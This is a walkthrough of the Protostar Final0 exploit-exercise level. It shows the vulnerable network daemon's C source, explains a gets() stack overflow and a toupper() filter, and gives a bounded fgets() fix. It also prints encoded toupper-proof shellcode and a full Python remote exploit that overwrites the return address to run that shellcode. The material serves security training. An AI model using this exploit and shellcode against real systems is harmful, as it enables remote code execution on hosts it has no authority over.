
Binary Exploitation Protostar Final0 - Walkthrough

Hello guys,

Today in this post I am going to share my walkthrough of the Exploit Exercises Protostar Final0 level.

Before starting the walkthrough, let's take a look at the hints and details.

Note: I want to highlight a few points.

  • I'm not the creator of the Protostar war game; I am just a player.
  • Here I am just providing hints and references, so if you feel stuck anywhere, take a look here.
  • Understand all previous levels before starting this one.
  • Do some research on assembly, C/C++ and GDB.
  • Do some research about heap overflow exploitation.
  • All credit related to the Exploit Exercises war games goes to exploit-exercises.com.

Let's start.

Hint


This level combines a stack overflow and network programming for a remote overflow.

Hints: depending on where you are returning to, you may wish to use a toupper() proof shellcode.

Core files will be in /tmp.

This level is at /opt/protostar/bin/final0

Source Code


#include "../common/common.c"

#define NAME "final0"
#define UID 0
#define GID 0
#define PORT 2995

/*
 * Read the username in from the network
 */

char *get_username()
{
  char buffer[512];
  char *q;
  int i;

  memset(buffer, 0, sizeof(buffer));
  gets(buffer);

  /* Strip off trailing new line characters */
  q = strchr(buffer, '\n');
  if(q) *q = 0;
  q = strchr(buffer, '\r');
  if(q) *q = 0;

  /* Convert to lower case */
  for(i = 0; i < strlen(buffer); i++) {
      buffer[i] = toupper(buffer[i]);
  }

  /* Duplicate the string and return it */
  return strdup(buffer);
}

int main(int argc, char **argv, char **envp)
{
  int fd;
  char *username;

  /* Run the process as a daemon */
  background_process(NAME, UID, GID); 
  
  /* Wait for socket activity and return */
  fd = serve_forever(PORT);

  /* Set the client socket to STDIN, STDOUT, and STDERR */
  set_io(fd);

  username = get_username();
  
  printf("No such user %s\n", username);
}


Description

Honestly, after reading the source code of this program I spotted the buffer overflow vulnerability within two minutes. Here:

  gets(buffer);

We already encountered this vulnerable function in a previous level: gets() reads until a newline with no bound, while buffer holds only 512 bytes, so a longer line runs past it and over the saved return address. But then I noticed a problem:

  /* Convert to lower case */
  for(i = 0; i < strlen(buffer); i++) {
      buffer[i] = toupper(buffer[i]);
  }

For those who do not understand what this code does: despite the comment, it converts every lowercase letter in the input to uppercase, so any payload byte in the range 'a' to 'z' is changed before the function returns. So we need shellcode that survives this transformation. After Googling, I found the shellcode below on Exploit-DB.
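For comparison, here is a bounded rewrite of the level's get_username() as an added example (my own code, not part of the Protostar source): fgets() replaces gets(), so a line longer than the buffer is rejected instead of overwriting the saved return address, while the CR/LF stripping and toupper() conversion are kept. The names read_username_bounded and get_username_safe are my own.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define USERNAME_MAX 512   /* same buffer size as the level's get_username() */

/* Bounded replacement for the level's get_username() logic (added example,
 * not part of the Protostar source). Copies at most dstlen-1 bytes of a
 * received line into dst, strips the trailing CR/LF and upper-cases it.
 * Returns 0 on success, -1 if the line does not fit, instead of overflowing. */
int read_username_bounded(const char *line, size_t linelen,
                          char *dst, size_t dstlen)
{
    size_t n = 0, i;
    if (dstlen == 0)
        return -1;
    /* Length of the username: everything before the first CR or LF */
    while (n < linelen && line[n] != '\n' && line[n] != '\r')
        n++;
    /* Too long for the destination: reject, never truncate silently */
    if (n >= dstlen)
        return -1;
    memcpy(dst, line, n);
    dst[n] = '\0';
    for (i = 0; i < n; i++)
        dst[i] = (char)toupper((unsigned char)dst[i]);
    return 0;
}

/* Drop-in for get_username(): fgets() stops after sizeof(buffer)-1 bytes, so
 * a long line can no longer reach the saved return address on the stack.
 * Returns NULL on EOF or when the client sent more than fits. */
char *get_username_safe(char *out, size_t outlen)
{
    char buffer[USERNAME_MAX];
    size_t len;
    int c;

    if (fgets(buffer, sizeof(buffer), stdin) == NULL)
        return NULL;
    len = strlen(buffer);
    /* Buffer filled without a newline: discard the rest of the line */
    if (len == sizeof(buffer) - 1 && buffer[len - 1] != '\n') {
        while ((c = getchar()) != EOF && c != '\n')
            ;
        return NULL;
    }
    return read_username_bounded(buffer, len, out, outlen) == 0 ? out : NULL;
}
```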

Shellcode


#########################################################################################
#                   Shellcode Manufacturing Section
#########################################################################################


# to_upper shellcode
upper_shellcode = ''
#/* _start */
upper_shellcode += "\xeb\x02" #  /* jmp short A          */

#/* A */
upper_shellcode += "\xeb\x05" #   /* jmp short C          */

# /* B */
upper_shellcode += "\xe8\xf9\xff\xff\xff" # /* call A               */

#  /* C */
upper_shellcode += "\x5f"   # /* pop edi              */
upper_shellcode += "\x81\xef\xdf\xff\xff\xff" #/* sub edi, 0xffffffdf  */
upper_shellcode += "\x57"          #  /* push edi             */
upper_shellcode += "\x5e"           #  /* pop esi              */
upper_shellcode += "\x29\xc9"   #/* sub ecx, ecx         */
upper_shellcode += "\x80\xc1\xb8"  # /* add cl, 0xb8         */

#  /* bucle */
upper_shellcode += "\x8a\x07"   #  /* mov al, byte [edi]   */
upper_shellcode += "\x2c\x41"   #  /* sub al, 0x41         */
upper_shellcode += "\xc0\xe0\x04" #   /* shl al, 4            */
upper_shellcode += "\x47"   #   /* inc edi              */
upper_shellcode += "\x02\x07"   #  /* add al, byte [edi]   */
upper_shellcode += "\x2c\x41"   #  /* sub al, 0x41         */
upper_shellcode += "\x88\x06"   #  /* mov byte [esi], al   */
upper_shellcode += "\x46"   #   /* inc esi              */
upper_shellcode += "\x47"   #   /* inc edi              */
upper_shellcode += "\x49"   #   /* dec ecx              */
upper_shellcode += "\xe2\xed"   #  /* loop bucle           */

# /* Encoded shellcode, 184 (0xb8) bytes */
upper_shellcode += "DBMAFAEAIJMDFAEAFAIJOBLAGGMNIADBNCFCGGGIBDNCEDGGFDIJOBGKB"
upper_shellcode += "AFBFAIJOBLAGGMNIAEAIJEECEAEEDEDLAGGMNIAIDMEAMFCFCEDLAGGMNIA"
upper_shellcode += "JDIJNBLADPMNIAEBIAPJADHFPGFCGIGOCPHDGIGICPCPGCGJIJODFCFDIJO"
upper_shellcode += "BLAALMNIA"

Well, Game Over

Exploit

#!/usr/bin/python
import struct
import socket

#########################################################################################
#                   Shellcode Manufacturing Section
#########################################################################################


# to_upper shellcode
upper_shellcode = ''
#/* _start */
upper_shellcode += "\xeb\x02" #  /* jmp short A          */

#/* A */
upper_shellcode += "\xeb\x05" #   /* jmp short C          */

# /* B */
upper_shellcode += "\xe8\xf9\xff\xff\xff" # /* call A               */

#  /* C */
upper_shellcode += "\x5f"   # /* pop edi              */
upper_shellcode += "\x81\xef\xdf\xff\xff\xff" #/* sub edi, 0xffffffdf  */
upper_shellcode += "\x57"          #  /* push edi             */
upper_shellcode += "\x5e"           #  /* pop esi              */
upper_shellcode += "\x29\xc9"   #/* sub ecx, ecx         */
upper_shellcode += "\x80\xc1\xb8"  # /* add cl, 0xb8         */

#  /* bucle */
upper_shellcode += "\x8a\x07"   #  /* mov al, byte [edi]   */
upper_shellcode += "\x2c\x41"   #  /* sub al, 0x41         */
upper_shellcode += "\xc0\xe0\x04" #   /* shl al, 4            */
upper_shellcode += "\x47"   #   /* inc edi              */
upper_shellcode += "\x02\x07"   #  /* add al, byte [edi]   */
upper_shellcode += "\x2c\x41"   #  /* sub al, 0x41         */
upper_shellcode += "\x88\x06"   #  /* mov byte [esi], al   */
upper_shellcode += "\x46"   #   /* inc esi              */
upper_shellcode += "\x47"   #   /* inc edi              */
upper_shellcode += "\x49"   #   /* dec ecx              */
upper_shellcode += "\xe2\xed"   #  /* loop bucle           */

# /* Encoded shellcode, 184 (0xb8) bytes */
upper_shellcode += "DBMAFAEAIJMDFAEAFAIJOBLAGGMNIADBNCFCGGGIBDNCEDGGFDIJOBGKB"
upper_shellcode += "AFBFAIJOBLAGGMNIAEAIJEECEAEEDEDLAGGMNIAIDMEAMFCFCEDLAGGMNIA"
upper_shellcode += "JDIJNBLADPMNIAEBIAPJADHFPGFCGIGOCPHDGIGICPCPGCGJIJODFCFDIJO"
upper_shellcode += "BLAALMNIA"


shellcode = upper_shellcode

shellcode+= '\x90'*120
#####################################################################################
#                Payload Sending Section
#####################################################################################


# Shellcode Length
slen = len(upper_shellcode)

# Victim Configuration
PORT = 2995
HOST = "192.168.56.101"

BuffSize = 532 # Don't Include EIP Padding Length
RETPoint =  0xbffffa50 # Return Pointer Pointing


# Create Socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)


# Connect Socket 
s.connect((HOST, PORT))


# Payload Generating Here
payload = ''


# Load NOP + Shellcode
payload+= '\x90'*(BuffSize-len(shellcode)) + shellcode

# Load EIP pointer
payload+= struct.pack("I", RETPoint ) # Return Address

# Additional Data
payload+= '\n'

# Send payload
s.send(payload)

# Check output
#print s.recv(1024)

# Close
s.close()

For a more detailed walkthrough, check the YouTube video playlist provided below.


